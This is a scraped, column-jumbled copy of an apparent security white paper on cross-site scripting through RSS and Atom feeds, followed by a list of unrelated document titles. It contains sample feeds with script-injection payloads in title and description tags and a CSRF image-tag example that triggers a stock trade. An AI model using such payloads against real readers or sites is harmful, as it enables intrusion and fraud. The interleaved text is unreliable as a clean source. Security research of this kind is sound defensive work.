Feed Injection in Web 2.0: Hacking RSS and Atom Feed Implementations White Paper Table of Contents Introduction

Feed injection in Web 2.0: hacking RSS and Atom feed implementations White paper Table of contents Introduction .................................................................................................................................... 3 Web feeds as attack vectors .............................................................................................................. 3 Readers that treat <> as literals........................................................................................................ 3 Readers that convert HTML entities to their true values ........................................................................ 4 Readers that strip < > < and > during display ............................................................................ 4 Risks by zone .................................................................................................................................. 5 Remote zone risks .......................................................................................................................... 5 Local zone risks ............................................................................................................................ 5 Reader type-specific risks .................................................................................................................. 6 Web reader risks .......................................................................................................................... 6 Website risks ................................................................................................................................ 6 Using a feed as a deployment vector .................................................................................................. 6 How do you utilize a web feed vulnerability? ....................................................................................7 Risks by standard ............................................................................................................................ 7 RSS .............................................................................................................................................. 7 Atom ............................................................................................................................................ 7 Conclusion ...................................................................................................................................... 8 Appendix: references and additional reading ...................................................................................... 8 Introduction Readers that treat <> as literals The majority of tested readers use Microsoft® Internet Web 2.0 resulted from the movement to build a more Explorer® components to display data. In certain cases responsive web. A new feature is the utilization of when a feed contains HTML tags, the viewer application extensible markup language (XML) content feeds that displays the content literally. The following RSS 2.0 use the Really Simple Syndication (RSS) and Atom example shows a feed with only relevant tags: standards. These feeds allow both users and websites to <?xml version="1.0" encoding="ISO-8859-1"?> <rss obtain content headlines and body text without needing version="2.0"> <channel> to visit a site, providing you with a summary of the site’s <title> <script>alert('Channel Title')</script> content. Unfortunately, many of the applications that </title> receive this data do not consider the security implications <link>http://www.mycoolsite.com/ of using third-party content, and they unknowingly make </link> themselves and their attached systems susceptible to <description> <script>alert('Channel various forms of attack. Description')</script> </description> <language>en-us This white paper discusses various forms of attacks </language> based on web feeds that follow the RSS, Atom and <copyright>Mr Cool 2007</copyright> XML standards. The paper does not describe each XML <pubDate>Thu, 22 Aug 2007 11:09:23 element in detail and its usage within web-based feeds, EDT</pubDate> <ttl>10</ttl> <image> nor does it address other vulnerability scenarios, such <title> <script>alert('Channel Image Title')</script> as buffer overflows and other XML-specific risks. This </title> paper outlines the risks of lesser-known threats that are <link>http://www.mycoolsite.com/</link> currently emerging on the web from cross-site scripting. <url>http://www.mycoolsite.com/logo.gif</url> <width>144</width> <height>33</height> Web feeds as attack <description> <script>alert('Channel Image Description')</script> </description> vectors </image> Browsers, local readers, websites and online portals <item> such as Bloglines subscribe to feeds. These applications <title> <script>alert('Item Title')</script> </title> automatically fetch new content at intervals defined either <link>http://www.mycoolsite.com/lonely.html</link> on the receiving client or by the feed itself. Once users <description> <script>alert('Item Description')</script> </description> are subscribed, they are alerted to new entries where they can read the story title and usually a brief descrip - <pubDate>Thu, 22 Aug 2007 11:08:14 EDT</pubDate> tion of the story body. RSS specifications state that story <guid>http://mysite/Mrguid</guid> bodies, the <description> tag, allow HTML entities in </item> order to support HTML formatting, but they do not spec- </channel> ify the use of literal HTML tag inclusions. Research into </rss> several web feed readers reveals different approaches to treating feed input and passing content to users. 3 Multiple instances of script injection appear in this Description')</script> example. During the presentation phase, readers treat </description> the data as a literal and execute the script contained in </image> the feed, in this case, JavaScript™. This may be used <item> to install malicious software on the client system, steal <title> <script>alert('Item Title')</script> </title> cookies or conduct a wide range of harmful activities. <link>http://www.mycoolsite.com/lonely.html</link> <description> <script>alert('Item Readers that convert HTML entities to Description')</script> </description> <pubDate>Thu, 22 Aug 2007 11:08:14 EDT</pubDate> their true values <guid>http://mysite/Mrguid</guid> Most of the time, developers implement the standard </item> XML specification for their web-based readers and </channel> convert HTML entities to their real values. Unfortunately, </rss> when they display this converted data, they may not consider the potential for script injection. The following Typically these RSS viewers convert < to < and > example uses an RSS 2.0 feed: to > and then add that content to the content viewer <?xml version="1.0" encoding="ISO-8859-1"?> (typically a browser component), which supports script <rss version="2.0"> execution. The majority of these readers converts the <channel> feed content and saves it to a file on the hard disk <title> <script>alert('Channel Title')</script> before loading it into the viewer. This opens the local </title> zone as detailed in the Local zone risks section, dis - <link>http://www.mycoolsite.com/</link> cussed later in this paper. <description> <script>alert('Channel Description')</script> Readers that strip < > < and > </description> <language>en-us</language> during display <copyright>Mr Cool 2007</copyright> The safest readers are not affected, because they strip <pubDate>Thu, 22 Aug 2007 11:09:23 out HTML entities and metacharacters before displaying EDT</pubDate> <ttl>10</ttl> the information to the user. Readers that support both <image> RSS and Atom technologies properly strip one technology <title> <script>alert('Channel Image but not the other and are still vulnerable. Title')</script> </title> If you are familiar with cross-site scripting attacks, you <link>http://www.mycoolsite.com/</link> <url>http://www.mycoolsite.com/logo.gif</url> may know some of the things you can do with script <width>144</width> injection. However, make sure you consider all of the <height>33</height> implications regarding web feed readers. <description> <script>alert('Channel Image 4 POST data and spam Risks by zone Many web applications use common web libraries, such as the Perl CGI.PM module, for various functions Remote zone risks including parameter fetching. Some of these libraries Web browsers and web-based readers are usually in let developers request “give me this parameter” without the remote zone category. When a reader is vulnerable specifying whether the request came into the application in the remote zone, attackers are limited in what they as POST data or GET. If the application uses POST, an can do. However, successful attacks can still occur. attacker who wants to attack a remote system’s appli - cation may convert the requests to GET. Depending on Cross-site request forgery the number of vulnerable subscribers, an attacker may An attacker can use cross-site request forgery (CSRF or exploit this feature and cause thousands of victims to XSRF) attacks in various ways to make a system send spam a particular site with submissions from web forms. requests to a website in order to execute commands. For example: Local zone risks <imgsrc="http://www.mystocktradersite.com/transaction The readers that make users vulnerable to local zone .asp?sell=google&buy=Microsoft&numshares=1000"> attacks typically convert the feed into an HTML

Feed Injection in Web 2.0: Hacking RSS and Atom Feed Implementations White Paper Table of Contents Introduction

Working with Feeds, RSS, and Atom

Feed Your ‘Need to Read’ – an Explanation of RSS

RSS Ideas for Educators

Feeds That Matter: a Study of Bloglines Subscriptions

Guide to Creating Maxthon Plugins Page 3 of 33

Cloud Computing Bible

Download the Index

From Cutting Edge to Practical Application Stephanie Willen Brown University of Connecticut, [email protected]

RSS Readers & Customized Dashboards

What Is RSS and How Can It Serve Libraries?

The Routledge Companion to Remix Studies

What Is an RSS Feed and How Can I Subscribe? Really Simple Syndication (RSS) Is an XML-Based Format for Content Distribution